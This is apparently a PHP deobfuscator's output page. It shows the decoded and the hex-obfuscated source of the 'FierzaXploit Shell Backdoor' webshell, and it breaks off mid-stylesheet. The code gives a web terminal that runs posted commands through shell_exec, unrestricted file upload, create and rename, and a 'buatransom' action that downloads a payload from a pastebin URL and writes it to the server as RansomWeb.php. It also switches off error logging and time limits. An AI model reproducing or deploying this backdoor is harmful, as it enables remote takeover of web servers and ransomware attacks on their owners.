goto jF2FQ;
CJtzJ: QArCp: goto Dazrs;
etrN_: goto ifBFV;
goto D4tz1;
q72sG: goto JDEDT;
goto yskXd;
saviH: JxNsu: goto kopA0;
l9LlZ: pJJz_: goto i902r;
QH3W5: if ($_GET["aksi"] == "buatransom") { $url = "https://pastebin.com/raw/LbVhNnZF";
$curl = curl_init($url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$get = curl_exec($curl);
if ($get != '') { $puts = fopen("RansomWeb.php", "w");
fwrite($puts, $get);
fclose($puts);
$nama_file = "RansomWeb.php";
$server_web = "http://" . $_SERVER["HTTP_HOST"] . "/";
if ($puts != '') { echo "<script>window.location='?path=" . $path . "';alert('Sukses')</script>";
} else { echo "Gagal Membuat File";
} } } goto q72sG;
aLb0r: AL7F1: goto t550g;
cMYHn: goto qTXxQ;
goto CWGHy;
dhclf: haaxP: goto zT5IZ;
JDWNg: FY1gj: goto tpRGg;
bK3Zu: if (isset($_POST["btn"])) { $nama = $_FILES["upl"]["name"];
$lokasi = $_FILES["upl"]["tmp_name"];
$folder = '';
if (move_uploaded_file($lokasi, $folder . $nama)) { echo "<script>swal("Berhasil Upload!!!", "Selamat anda Bisa Mengupload File", "success");</script>";
} else { echo "<script> swal("Gagal Upload!!!", "Maaf Tidak Bisa Upload File", "error");</script>";
} } goto fPtSX;
F73IM: goto AGQ7r;
goto KFC7Z;
ylXBo: ?>
</li> </ul> </div> <a class="btn btn-light" data-bs-toggle="collapse" href="#multiCollapseExample1" role="button" aria-expanded="false" aria-controls="multiCollapseExample1"><i class="bi bi-info-circle"></i> About Shell</a> <div class="col"> <div class="collapse multi-collapse" id="multiCollapseExample1"> <div class="card card-body"> <b>FierzaXploit Shell Backdoor</b><hr> <p> Adalah shell bypass dengan UI Yang apik & Responsive, Cocok digunakan untuk anda yang<br> tidak memiliki laptop/personal komputer.<br>Author : FierzaXploit/Mr.MF33</p> </div> </div> </div> <br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br> <hr class="pembatas"> <p><i class="bi bi-check-circle"></i> Version Webshell : 1.1(Realese)</p> </div> </div> </div> </nav> <!-- akhir navbar --> <!-- list file/folder --> <div class="container-fluid"> <div class="row"> <?php goto evrxU;
s2CZX: goto AauIZ;
goto k9_qn;
lYoN0: if ($_GET["aksi"] == "buatfolder") { if (isset($_POST["folderss"])) { $folder = $_POST["namaF"];
$nama_folder = $path . "/" . $folder;
$buat_folder = mkdir($nama_folder);
if ($buat_folder) { echo "<script>window.location='?path=" . $path . "';alert('Folder Sukses Dibuat!')</script>";
} else { echo "<script>window.location='?path=" . $nama_folder . "';alert('Folder Gagal Dibuat')</script>";
} } echo " <form method="POST"> <label for="exampleFormControlInput1" class="label form-label">Nama Folder :</label> <div class="tambahdir input-group mb-3"> <input name="namaF" type="text" class="form-control" placeholder="Masukkan Nama Folder" aria-describedby="button-addon2"> <button name="folderss" class="klik btn btn-outline-secondary" type="submit" id="button-addon2">Create Folder</button> </div> </form>";
} goto Sw8t6;
yVK2Z: ?>
<br> <div class="table-responsive-sm"> <table class="table table-dark table-hover table-sm"> <thead> <tr> <th scope="col-">Type</th> <th scope="col">Name</th> <th scope="col">Permission</th> <th scope="col">options</th> </tr> </thead> <tbody> <?php goto oa08o;
KE1J6: oSCCZ: goto a43tW;
Li6uM: SyNz4: goto wTLL7;
K9M6v: umLDt: goto zbBRb;
Mpn4G: EZ0tt: goto u9i_V;
XxW0A: @clearstatcache();
goto iJL_x;
dHbjl: goto qKC2R;
goto FF9z1;
oWvqN: if ($_GET["aksi"] == "terminal") { echo "<div class="alert"> <button type="button" class="btn btn-danger" data-bs-dismiss="alert" aria-label="Close"><i class="bi bi-x-lg"></i></button> <form method="post"> <div class="input-group flex-nowrap"> <span class="input-group-text" id="addon-wrapping">root@User :~</span> <input type="text" name="shell" class="form-control" placeholder="Your Command" aria-label="Username" aria-describedby="addon-wrapping"> </div> </form>";
if (isset($_POST["shell"])) { $command = $_POST["shell"];
$shell = shell_exec($command);
} echo "<div class="mb-3"> <textarea class="form-control" id="exampleFormControlTextarea1" rows="20" aria-label="readonly input example" readonly>" . $shell . "</textarea> <div id="emailHelp" class="form-text"><font color="white">*NOTE : gunakan command sesuai os, jika os windows gunakan command cmd & jika os linux gunakan command linux<br>os = Operating System</font></div> </div></div>";
} goto cMYHn;
Rn05R: goto ohgyw;
goto V0tPI;
mc16c: fhkhs: goto EnfMF;
YjoII: WVZ9c: goto AFxID;
kopA0: @ini_set("output_buffering", FALSE);
goto n_8YG;
AXcgL: jXWMb: goto ixusX;
VKjnB: qwXuj: goto lkO2O;
MiQTU: @ini_set("display_errors", FALSE);
goto zvSdf;
gDINn: goto Ck2ZP;
goto saviH;
peaET: ?>
</center> </div> </div> </div> <br> <script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js" integrity="sha384-MrcW6ZMFYlzcLA8Nl+NtUVF0sA7MsXsP1UyJoMp4YLEuNSfAP+JcXn/tWtIaxVXM" crossorigin="anonymous"> </script> </body> </html></pre>
Did this file decode correctly?
Original Code
<pre><?php
goto ONp0q;
a43tW: @ini_set("\154\x6f\147\x5f\145\x72\x72\157\162\x73", FALSE);
goto n8F9Q;
zp_1J: goto QArCp;
goto j70eg;
QFgk6: GSbYH: goto VOmNo;
YHCZ1: if ($_GET["\x61\153\x73\151"] == "\x62\x75\141\x74\x66\x69\154\145") { if (isset($_POST["\142\x75\x61\x74"])) { $nama_file = $path . "\x2f" . $_POST["\156\x61\x6d\141\137\146\151\x6c\145"];
$isi_file = $_POST["\x69\163\x69"];
$buat_file = fopen($nama_file, "\x77");
fwrite($buat_file, $isi_file);
fclose($buat);
if (empty($buat)) { echo "\x3c\x73\143\x72\151\160\x74\x3e\x77\151\156\x64\x6f\x77\56\x6c\157\x63\141\164\x69\157\x6e\75\47\77\160\x61\164\x68\x3d" . $path . "\x27\x3b\x61\154\145\x72\x74\50\x27\123\165\x6b\163\145\163\41\x21\41\47\x29\x3c\x2f\x73\x63\162\x69\x70\x74\x3e";
} else { echo "\x3c\x73\143\x72\151\160\x74\76\167\151\156\x64\157\x77\x2e\154\157\x63\141\164\151\157\x6e\75\47\x3f\160\x61\164\x68\75" . $path . "\47\x3b\141\x6c\145\162\164\50\47\x47\x61\147\141\x6c\x21\41\41\x27\51\x3c\57\x73\143\162\x69\160\x74\76";
} } echo "\x3c\x64\151\x76\x20\x63\x6c\x61\x73\163\x3d\42\141\154\145\162\164\x22\x3e\40\74\143\145\156\x74\145\x72\x3e\x3c\x68\64\40\x63\154\141\163\x73\75\42\x74\x65\170\164\x2d\x77\x68\x69\164\145\42\76\173\x42\165\x61\x74\x20\x46\151\154\145\x20\x7d\74\x2f\150\64\x3e\74\57\x63\145\x6e\164\x65\x72\x3e\x20\x3c\146\x6f\x72\x6d\40\155\x65\164\150\157\144\x3d\x22\160\x6f\x73\164\x22\x20\143\x6c\141\x73\163\75\x22\x6d\164\55\63\42\x3e\x20\x3c\144\151\x76\40\143\x6c\141\163\163\75\x22\x6d\x62\55\x33\x22\x3e\x20\74\154\x61\142\145\154\40\146\x6f\162\x3d\42\x65\170\141\x6d\160\x6c\x65\106\157\162\x6d\103\157\156\x74\x72\x6f\x6c\x49\x6e\x70\165\x74\61\42\x20\143\154\141\x73\163\75\42\x74\x65\170\x74\x2d\x77\150\151\164\x65\x20\x66\157\162\155\x2d\154\x61\x62\145\154\42\76\116\141\155\141\x20\x46\151\x6c\x65\x20\x3a\74\x2f\x6c\141\142\x65\154\x3e\40\x3c\x69\x6e\x70\165\164\40\x74\x79\160\145\x3d\42\x74\x65\170\164\x22\40\x6e\x61\155\x65\75\42\x6e\141\155\141\137\146\151\x6c\x65\42\x20\x70\154\141\x63\x65\150\157\x6c\144\145\162\x3d\42\115\141\x73\x75\x6b\x6b\x61\156\40\x4e\x61\x6d\141\x20\106\x69\154\x65\x6e\171\x61\42\40\x63\x6c\141\163\163\75\42\x66\157\x72\155\x2d\x63\x6f\x6e\x74\x72\157\154\42\x20\151\x64\75\42\145\x78\x61\x6d\x70\x6c\145\x46\157\x72\155\x43\157\x6e\164\x72\157\154\x49\x6e\160\x75\x74\x31\x22\x20\160\154\141\x63\145\x68\157\154\x64\x65\x72\x3d\x22\156\x61\155\x65\x40\x65\170\141\155\160\x6c\145\x2e\143\x6f\155\x22\76\x20\74\57\x64\x69\x76\76\40\74\x64\151\166\40\143\x6c\141\x73\163\75\x22\x6d\142\55\63\x22\76\x20\x3c\x6c\x61\x62\145\x6c\x20\x66\x6f\x72\75\42\x65\170\141\155\x70\x6c\x65\106\x6f\162\x6d\x43\157\x6e\x74\x72\x6f\154\x54\x65\170\x74\x61\162\145\x61\x31\42\40\143\154\x61\163\163\x3d\x22\x74\x65\170\x74\x2d\x77\150\x69\164\x65\40\146\x6f\162\155\55\154\141\142\x65\x6c\x22\76\111\163\x69\x20\x46\x69\x6c\145\40\x3a\74\57\154\x61\142\145\154\x3e\40\x3c\164\145\170\164\141\x72\145\141\40\x63\x6c\x61\x73\x73\x3d\42\x66\157\x72\155\55\x63\157\156\x74\x72\x6f\x6c\42\x20\x6e\141\155\145\75\42\151\x73\151\42\x20\x70\x6c\x61\143\x65\x68\x6f\x6c\144\145\x72\75\x22\x4d\x61\x73\x75\x6b\153\141\x6e\x20\111\x73\151\x20\106\151\x6c\x65\156\171\x61\x22\x20\151\144\75\42\x65\170\141\x6d\x70\154\x65\106\157\x72\155\x43\157\156\164\162\157\154\x54\x65\x78\164\141\162\x65\x61\x31\x22\40\x72\157\x77\x73\75\42\x33\42\x3e\74\x2f\x74\145\170\164\x61\162\x65\141\x3e\x20\x3c\x2f\144\151\x76\76\74\x62\x72\76\40\74\142\x75\x74\164\x6f\x6e\40\x6e\x61\x6d\x65\75\42\x62\165\141\x74\42\x20\143\154\141\163\x73\x3d\42\164\157\x6d\142\x6f\x6c\x20\142\164\156\40\142\164\156\x2d\x6f\x75\x74\154\x69\x6e\x65\x2d\163\165\x63\x63\145\163\x73\x22\40\x74\x79\160\145\x3d\42\163\x75\x62\x6d\x69\x74\x22\76\103\x72\145\x61\x74\x65\x20\x4e\157\167\x3c\57\142\x75\x74\164\157\156\x3e\x20\x3c\x2f\146\x6f\162\x6d\76\x20\74\x62\x72\x3e\x20\74\142\165\x74\164\157\x6e\x20\164\x79\x70\x65\75\42\142\x75\164\x74\157\x6e\42\x20\x63\154\141\163\163\75\42\164\x6f\155\x62\x6f\154\40\142\x74\156\x20\142\x74\x6e\55\x64\141\156\x67\x65\x72\x22\x20\144\x61\x74\x61\x2d\x62\163\55\x64\x69\163\155\x69\x73\x73\x3d\x22\x61\x6c\x65\162\x74\x22\40\141\162\151\x61\x2d\x6c\x61\142\145\x6c\x3d\x22\x43\154\x6f\163\145\x22\x3e\x43\x61\x6e\143\x65\154\x3c\x2f\x62\x75\x74\x74\x6f\x6e\76\x20\74\x2f\x64\151\x76\76\x20\x3c\142\x72\76";
} goto zp_1J;
tXnxf: goto FY1gj;
goto ggFSH;
oLCZa: goto wZKeE;
goto KQsIO;
HjlHJ: goto Yp2Rw;
goto JAl6s;
XXtIF: @ini_set("\x6d\141\170\137\145\x78\145\143\165\x74\x69\x6f\x6e\x5f\x74\151\x6d\x65", FALSE);
goto sAzXs;
D3IVi: ?>
<li>Browser : <?php goto fth0D;
yskXd: qKC2R: goto EOI1o;
t1EEk: goto fhkhs;
goto KE1J6;
pEM73: echo date("\131") . "\x3c\x2f\x70\76";
goto o3y5R;
CsyHM: goto pJJz_;
goto eAO7y;
DHpGE: goto WVZ9c;
goto QFgk6;
AfZqn: goto qwXuj;
goto PNGUy;
vHTML: goto D2lid;
goto Li6uM;
jVoof: JDEDT: goto lYoN0;
Y9kzk: zCF_D: goto Z1imX;
AZYII: goto umLDt;
goto AafvC;
ewiuS: x7V9J: goto peaET;
QWcEH: rVp60: goto MiQTU;
ONp0q: goto NiTi4;
goto O7Une;
OuGV8: function browsernya() { $browser = '';
if (strpos($_SERVER["\x48\124\124\120\x5f\125\x53\105\122\137\101\x47\x45\x4e\124"], "\116\x65\x74\163\143\141\x70\145")) { $browser = "\x4e\145\x74\x73\x63\141\160\145";
echo $browser;
} else { if (strpos($_SERVER["\110\124\124\120\137\x55\x53\x45\x52\137\x41\107\105\x4e\124"], "\106\x69\x72\145\x66\x6f\x78")) { $browser = "\115\x6f\x7a\x69\x6c\154\141\x20\x46\x69\x72\x65\146\157\170";
echo $browser;
} else { if (strpos($_SERVER["\110\x54\x54\x50\x5f\125\123\105\122\x5f\101\x47\105\x4e\x54"], "\x43\150\x72\157\x6d\x65")) { $browser = "\x47\x6f\x6f\147\154\145\x20\x43\x68\162\x6f\155\x65";
echo $browser;
} else { if (strpos($_SERVER["\x48\124\x54\x50\x5f\125\x53\x45\x52\137\101\107\105\x4e\x54"], "\117\160\145\x72\141")) { $browser = "\117\160\x65\x72\141";
echo $browser;
} else { if (strpos($_SERVER["\110\124\124\120\137\125\123\105\x52\137\101\107\105\x4e\x54"], "\x4d\x53\x49\x45")) { $browser = "\x49\x6e\x74\145\x72\156\x65\164\40\105\170\x70\x6c\x6f\x72\x65\x72";
echo $browser;
} else { $browser = "\114\x61\x69\x6e\156\x79\x61";
echo $browser;
} } } } } } goto Xks96;
i902r: if ($_GET["\x61\153\163\x69"] == "\x72\145\x6e\x61\x6d\x65") { if (isset($_POST["\x72\x65\156\x61\155\145\137\x6e\x6f\x77"])) { $new_name = $_POST["\156\x65\167\x6e\141\155\x65"];
$rename_file = rename($new_name, $_GET["\x6e\x61\155\141\137\146\x69\154\145"]);
if (file_exists($rename_file)) { echo "\x3c\x73\143\162\151\x70\164\76\x61\154\x65\x72\x74\x28\47\x4e\141\x6d\141\40\x46\x69\x6c\145\x20\x53\x75\x64\141\x68\40\x44\x69\x67\x75\156\x61\x6b\141\x6e\47\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e";
} else { if (rename($_GET["\x6e\141\155\141\x5f\x66\x69\x6c\145"], $new_name)) { echo "\74\x73\x63\162\x69\x70\164\x3e\x77\151\156\x64\157\x77\x2e\154\157\x63\141\164\x69\x6f\156\x3d\42\77\x70\x61\x74\x68\x3d" . $path . "\42\73\141\x6c\145\162\x74\50\42\x53\165\x6b\x73\145\x73\40\x4d\x65\x6e\x67\147\x61\156\164\x69\40\x4e\141\x6d\x61\42\x29\x3b\74\x2f\x73\x63\x72\x69\160\164\x3e";
} else { echo "\74\163\143\162\151\x70\164\x3e\x77\151\156\x64\x6f\x77\56\x6c\x6f\x63\141\164\151\x6f\156\75\47\77\x70\141\164\x68\75" . $path . "\47\73\x61\x6c\x65\162\x74\x28\47\115\x61\141\146\x20\101\156\x64\x61\40\147\141\147\141\x6c\40\115\x65\x72\145\x6e\141\155\x65\x27\51\73\74\57\x73\143\x72\x69\160\x74\76";
} } } echo "\74\x64\151\x76\40\x63\154\x61\163\x73\75\x22\141\154\145\x72\164\x22\x3e\x20\74\x66\x6f\162\x6d\40\x6d\x65\x74\150\x6f\x64\75\x22\x50\117\123\x54\x22\x3e\x20\74\x64\x69\166\x20\x63\x6c\x61\163\x73\x3d\x22\x6d\x62\x2d\63\x22\76\40\74\x6c\x61\x62\145\154\x20\x66\157\162\75\42\x65\170\141\x6d\x70\154\145\106\x6f\x72\155\x43\157\156\x74\162\x6f\154\x49\156\x70\165\x74\x31\42\40\x63\154\141\x73\x73\75\x22\164\x65\x78\164\x2d\x77\x68\151\164\145\40\x66\x6f\162\155\55\x6c\x61\142\x65\x6c\x22\x3e\x4e\141\155\x65\40\106\x69\154\x65\57\104\x69\162\145\143\164\x6f\x72\171\x3c\x2f\x6c\141\142\145\x6c\x3e\40\74\151\x6e\x70\165\164\40\156\141\155\x65\75\42\x6e\145\167\x6e\141\x6d\145\42\40\x74\x79\160\145\x3d\x22\164\x65\x78\164\42\40\143\x6c\141\x73\x73\75\x22\146\x6f\162\155\x2d\x63\x6f\156\x74\162\157\x6c\x22\x20\x69\x64\x3d\42\145\x78\x61\155\x70\154\x65\106\157\x72\x6d\x43\x6f\x6e\x74\162\x6f\154\111\156\x70\x75\x74\x31\42\x20\166\141\x6c\165\x65\x3d\x22" . $_GET["\156\x61\x6d\x61\x5f\x66\x69\x6c\x65"] . "\x22\x20\160\154\x61\143\145\150\157\x6c\x64\145\x72\75\42\x4e\145\167\x20\x4e\x61\x6d\x65\x22\76\40\74\57\144\151\x76\x3e\40\x3c\x62\x72\x3e\40\x3c\151\156\x70\x75\x74\x20\164\x79\x70\145\75\x22\163\x75\142\155\x69\x74\42\x20\x6e\x61\155\145\75\42\x72\x65\x6e\x61\155\145\x5f\156\157\167\x22\x20\x76\x61\154\x75\145\x3d\42\122\x65\x6e\141\155\x65\40\116\157\x77\42\40\143\x6c\141\163\163\75\x22\164\x6f\155\x62\157\154\40\142\164\x6e\x20\142\x74\x6e\55\x6f\165\164\154\x69\x6e\145\55\163\x65\143\x6f\156\x64\x61\x72\171\40\x62\x74\156\x2d\x62\x6c\x6f\x63\153\42\x3e\40\x3c\x2f\x66\x6f\x72\155\76\40\x3c\142\162\76\74\x62\x72\x3e\x20\74\x62\165\164\164\x6f\156\x20\x74\x79\160\x65\75\x22\142\165\164\164\157\156\x22\x20\143\154\x61\x73\x73\x3d\x22\x74\x6f\155\x62\x6f\154\40\x62\x74\156\40\142\x74\156\x2d\144\x61\x6e\147\x65\x72\42\x20\x64\141\x74\x61\55\142\163\x2d\x64\x69\x73\x6d\151\x73\163\x3d\42\141\154\145\x72\164\42\x20\x61\x72\151\x61\x2d\154\141\142\145\154\75\x22\103\x6c\157\163\x65\42\x3e\103\x61\x6e\143\145\154\x3c\57\142\165\x74\x74\157\156\x3e\40\x3c\x2f\144\151\166\x3e";
} goto tXnxf;
g40jp: goto EZ0tt;
goto ewiuS;
FjoTC: goto krG0X;
goto R14mp;
AFxID: foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { $a = true;
echo "\40\x3c\141\40\x63\x6c\x61\163\x73\75\x22\160\x61\164\x68\42\40\150\x72\x65\x66\75\x22\77\x70\141\x74\150\x3d\x2f\x22\76\57\74\57\141\x3e\74\x2f\154\151\x3e";
continue;
} if ($pat == '') { continue;
} echo "\x3c\141\40\x68\162\x65\x66\x3d\42\x3f\x70\141\x74\150\75";
for ($i = 0;
$i <= $id;
$i++) { echo "{$paths[$i]}";
if ($i != $id) { echo "\57";
} } echo "\42\x20\143\x6c\x61\163\163\x3d\x22\x70\x61\x74\x68\x22\76" . $pat . "\x3c\57\141\x3e\57";
} goto VpPyx;
XjuP4: TkSsH: goto hfxx6;
uJEM8: ?>
</li> <li> <?php goto MLTcG;
zSzYi: ZusWR: goto S4peE;
MLTcG: goto haaxP;
goto uuJvA;
uZ2py: QW2AR: goto C9Nhm;
Csfjc: echo "\40\x3c\x66\x6f\x72\x6d\40\x6d\145\x74\x68\x6f\144\x3d\x22\x70\x6f\163\164\x22\40\x65\x6e\143\x74\x79\x70\x65\75\x22\155\165\154\x74\x69\x70\141\162\164\57\x66\x6f\162\x6d\55\144\141\x74\x61\42\76\x20\x3c\144\151\x76\x20\143\154\141\163\x73\75\x22\165\x70\154\x6f\x61\x64\145\x72\40\146\151\154\145\40\x69\x6e\x70\165\164\55\147\x72\157\165\x70\40\x69\x6e\160\165\164\55\147\162\157\165\x70\x2d\163\155\40\x6d\142\55\x33\x20\x6d\163\x2d\141\x75\164\157\x22\x3e\40\74\x69\156\x70\165\164\40\164\x79\160\145\x3d\x22\146\x69\x6c\x65\42\x20\x6e\x61\x6d\145\75\42\x75\160\x6c\42\x20\x63\154\141\163\163\x3d\42\x66\157\162\x6d\x2d\143\x6f\x6e\x74\x72\x6f\154\x22\x20\151\144\75\x22\151\156\160\165\x74\107\162\x6f\x75\x70\106\151\154\x65\60\x34\x22\40\141\x72\151\141\x2d\x64\x65\163\143\162\151\142\x65\x64\x62\171\x3d\x22\x69\x6e\160\x75\x74\x47\x72\x6f\165\160\x46\151\154\x65\101\x64\x64\x6f\156\x30\64\x22\40\x61\162\151\141\x2d\x6c\141\142\x65\x6c\75\42\x55\x70\154\157\x61\144\42\x3e\40\x3c\x62\x75\x74\x74\x6f\156\40\156\141\x6d\145\75\x22\x62\164\x6e\x22\40\x63\x6c\x61\163\x73\x3d\42\x62\164\156\40\142\x74\156\55\163\145\143\157\x6e\x64\x61\x72\171\x22\x20\164\171\x70\x65\75\x22\163\x75\x62\x6d\151\x74\x22\x20\x69\144\75\x22\151\156\x70\x75\164\107\162\157\x75\160\106\x69\154\145\101\x64\x64\157\156\60\64\x22\76\x3c\x69\40\143\154\141\163\x73\x3d\42\142\x69\x20\x62\151\x2d\x63\x6c\x6f\165\x64\x2d\x75\x70\x6c\157\x61\x64\55\146\x69\154\154\42\76\x3c\x2f\x69\76\x20\125\x70\x6c\157\x61\x64\x3c\x2f\x62\165\x74\164\x6f\x6e\x3e\x20\x3c\57\144\x69\166\x3e\40\74\57\146\157\162\x6d\x3e\40\74\41\x2d\55\x20\164\141\155\142\141\x68\40\146\151\154\145\57\x66\x6f\x6c\144\x65\x72\x20\46\x20\x72\x61\156\x73\x6f\155\x77\145\142\40\55\x2d\76\40\x3c\x64\151\x76\40\143\154\x61\x73\163\x3d\42\164\141\155\x62\x61\x68\42\x3e\x20\x3c\144\151\x76\40\x63\154\x61\x73\x73\75\x22\143\157\156\164\141\x69\156\145\162\x2d\146\154\x75\x69\144\42\x3e\40\74\x63\x65\x6e\164\x65\162\76\40\74\x64\151\x76\40\x63\154\x61\x73\x73\x3d\x22\162\x6f\x77\40\162\157\x77\55\143\x6f\154\163\55\64\x22\x3e\40\74\41\55\x2d\x20\x74\x61\x6d\142\141\x68\x20\146\151\154\x65\x20\55\x2d\76\x20\74\144\x69\x76\40\143\x6c\x61\163\163\x3d\x22\x63\157\154\x22\76\x20\74\x61\40\143\154\141\163\163\x3d\x22\x70\141\164\150\42\40\x68\162\145\x66\75\x22\x3f\x70\141\164\x68\x3d" . $path . "\46\141\153\163\151\75\142\165\x61\x74\x66\x69\x6c\145\42\x3e\x3c\x66\157\156\164\x20\163\151\x7a\145\x3d\42\x35\42\x3e\x3c\x69\x20\143\154\141\163\163\75\42\x62\151\x20\x62\x69\55\x66\x69\154\145\x2d\145\141\x72\155\x61\162\153\55\160\154\165\x73\55\146\x69\x6c\154\x22\76\74\x2f\x69\x3e\74\x2f\x66\x6f\x6e\164\x3e\40\x46\151\x6c\145\x3c\x2f\141\76\40\74\x2f\x64\x69\166\x3e\x20\x3c\x21\x2d\55\40\141\153\x68\151\x72\x20\x74\x61\x6d\x62\x61\x68\x20\146\x69\154\x65\40\55\55\76\40\74\41\55\x2d\x20\x74\x61\155\x62\141\x68\40\x66\x6f\x6c\144\145\x72\40\x2d\x2d\76\x20\74\x64\151\166\x20\x63\x6c\x61\x73\163\75\x22\x63\x6f\x6c\x22\x3e\40\74\x61\40\143\154\x61\163\163\x3d\x22\160\141\164\150\x22\x20\150\162\x65\x66\75\42\x3f\160\141\x74\x68\75" . $path . "\46\x61\153\163\151\75\142\165\141\164\146\x6f\x6c\x64\x65\162\42\76\x3c\146\x6f\x6e\x74\x20\163\151\x7a\145\x3d\x22\x35\42\76\x3c\151\x20\x63\x6c\x61\x73\x73\75\x22\142\x69\x20\142\x69\x2d\x66\157\154\144\145\x72\x2d\160\154\x75\163\x22\76\x3c\57\x69\76\74\57\146\157\x6e\164\x3e\40\106\x6f\x6c\x64\145\x72\74\x2f\x61\x3e\40\74\x2f\x64\x69\166\x3e\40\x3c\41\x2d\x2d\40\x41\x6b\150\151\162\x20\164\x61\x6d\x62\141\x68\40\x66\157\x6c\144\x65\162\40\55\55\x3e\x20\x3c\41\55\x2d\x20\164\x65\x72\x6d\151\156\x61\154\x20\x2d\55\76\40\74\x64\x69\x76\x20\x63\x6c\x61\x73\x73\x3d\42\x63\157\x6c\42\x3e\x20\74\x61\40\143\x6c\141\x73\163\x3d\42\x70\141\x74\150\x22\x20\150\162\145\146\75\42\77\160\141\x74\150\75" . $path . "\x26\x61\153\x73\151\x3d\164\x65\162\155\x69\156\x61\154\42\x3e\x3c\146\x6f\156\x74\40\x73\151\172\145\x3d\42\x35\x22\x3e\74\151\x20\x63\154\141\x73\163\x3d\42\x62\151\x20\142\151\x2d\164\x65\x72\x6d\x69\156\141\x6c\42\x3e\x3c\57\x69\76\74\57\x66\x6f\156\x74\76\40\x54\x65\162\x6d\151\x6e\141\x6c\74\57\141\76\40\x3c\x2f\144\x69\x76\76\40\74\x21\55\55\40\101\153\150\151\162\x20\x74\145\162\x6d\151\x6e\141\x6c\40\55\55\x3e\x20\x3c\x21\55\x2d\40\x61\x75\164\157\40\x63\162\145\141\164\145\40\x72\141\156\163\157\155\167\145\142\x20\55\55\x3e\40\x3c\144\x69\166\40\143\154\141\x73\x73\75\x22\x63\157\x6c\x22\x3e\x20\74\141\x20\x63\x6c\141\x73\x73\x3d\42\x70\141\164\150\x22\40\x68\162\x65\x66\75\42\x3f\x70\141\164\x68\x3d" . $path . "\x26\141\153\163\x69\x3d\x62\165\x61\164\162\141\156\x73\157\155\x22\x3e\x3c\x66\x6f\x6e\164\x20\163\151\x7a\145\75\x22\x35\x22\x3e\x3c\x69\40\x63\x6c\x61\x73\x73\x3d\42\x62\151\x20\142\151\55\146\x69\154\145\x2d\x65\x61\x72\155\x61\x72\x6b\x2d\154\157\x63\x6b\x32\x2d\146\x69\x6c\154\42\76\74\x2f\151\x3e\x3c\57\146\x6f\x6e\164\76\40\122\141\156\163\157\155\74\x62\162\76\x77\145\x62\74\57\141\76\x20\x3c\x2f\144\x69\x76\x3e\40\x3c\41\55\x2d\40\x61\x6b\150\x69\x72\x20\141\165\x74\x6f\x20\x63\x72\x65\141\x74\145\x20\162\x61\x6e\163\157\155\167\145\142\x20\x2d\x2d\76\40\x3c\x2f\144\151\166\76\40\x3c\x2f\143\145\x6e\x74\145\162\76\x20\x3c\57\x64\151\x76\x3e\40\74\57\x64\x69\x76\x3e\x20\74\41\55\55\40\141\x6b\150\x69\x72\40\164\x61\155\142\x61\150\x20\x66\x69\154\145\x2f\x66\157\x6c\144\x65\162\40\46\40\162\x61\156\163\x6f\x6d\167\x65\142\x20\55\x2d\x3e";
goto WAgQg;
R14mp: qTXxQ: goto QH3W5;
fPtSX: goto sr1jj;
goto VKjnB;
Lm29W: ?>
<!doctype html> <html id="up" lang="en"> <head> <!-- Required meta tags --> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- Bootstrap CSS --> <link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/4.1.1/animate.min.css"/> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/[email protected]/font/bootstrap-icons.css"> <link class="img-thumbnail" rel="shortcut icon" href="https://i.ibb.co/4f3J9h0/guy-fawkes-mask.png" /> <title>FierzaXploit</title> <style> body {width: 100%;
text-decoration: none;
overflow-x: hidden !important;
color: black!important;
width: 100%;
}.shell {width: 100%;
}.pembatas{margin-top: 123px !important;
}.gambar{width: 100px;
height: 100px;
}.tulisan {color: #fff;
font-size: 12pt;
margin-top: 15px;
text-decoration: none;
}.path {color: #fff;
font-size: 12pt;
text-decoration: none;
}.path:hover {color: #c2c7d6;
}.info {color: #fff;
font-size: 12pt;
text-decoration: none;
margin-top: -50px;
}.navbar .nav-link {color: #fff !important;
text-decoration: none;
font-size: 12pt;
margin-top: 10px;
}.navbar-brand {padding-top: 15px;
color: #fff !important;
text-decoration: none;
}.file {width: 90%;
}.uploader {background: 0 0 !important;
color: #fff;
}.menu {margin-top: 15px;
}.tombol {margin-top: -30px;
width: 100%;
color: #fff;
}.tutup {z-index: 999 !important;
margin-top: -10px !important;
visibility: visible !important;
}.bgnya {background-color: transparent;
visibility: hidden;
}.lihat {visibility: visible !important;
width: 126% !important;
margin-top: -20px;
margin-left: -30px;
}.tools {visibility: visible;
margin-top: -3px;
}.tambah {margin-top: 20px;
margin-bottom: 20px;
}.label {margin-top: 10px;
}.tambahdir {margin-top: 5px;
color: #fff;
width: 90%;
}.klik {width: 45%;
color: #fff;
}::marker {color: #f5f5f5;
size: 100px !important;
}.pathnya {margin-top: -10px;
}.tablenya {overflow-x: scroll;
}.pembatas{margin-top: 25px;
}.up-icon{z-index: 9999;
position: fixed;
width: 30px;
height: 30px;
border-radius: 50%;
background: white;
bottom: 40px;
right: 50px;
text-decoration: none;
text-align: center;
line-height: 50px;
color: white;
}.home{margin-top: -15px;
}.home,.linknya{color: white !important;
text-decoration: none;
}.information-server{margin-bottom: -17px;
}.bi-chevron-up{font-size: 20px;
line-height: 25px;
color:black;
}@media (min-width: 768px) {body {text-decoration: none;
overflow-x: hidden;
color: #fff;
width: 100%;
}.shell {width: 100%;
}.uploader {background: 0 0 !important;
color: #fff;
}.tombol {margin-top: -30px;
width: 100%;
color: #fff;
}.tutup {z-index: 999 !important;
margin-top: -10px !important;
visibility: visible !important;
margin-left: -10px;
}.bgnya {background-color: transparent;
visibility: hidden;
}.lihat {visibility: visible !important;
width: 112% !important;
margin-top: -20px;
margin-left: -30px;
}.tambah {margin-top: 30px;
margin-bottom: 25px;
}.label {margin-top: 10px;
}.tambahdir {margin-top: 5px;
color: #fff;
width: 30%;
}.klik {width: 50%;
color: #fff;
}.pembatas{margin-top: 25px;
}.up-icon{z-index: 9999;
position: fixed;
width: 30px;
height: 30px;
border-radius: 50%;
background: white;
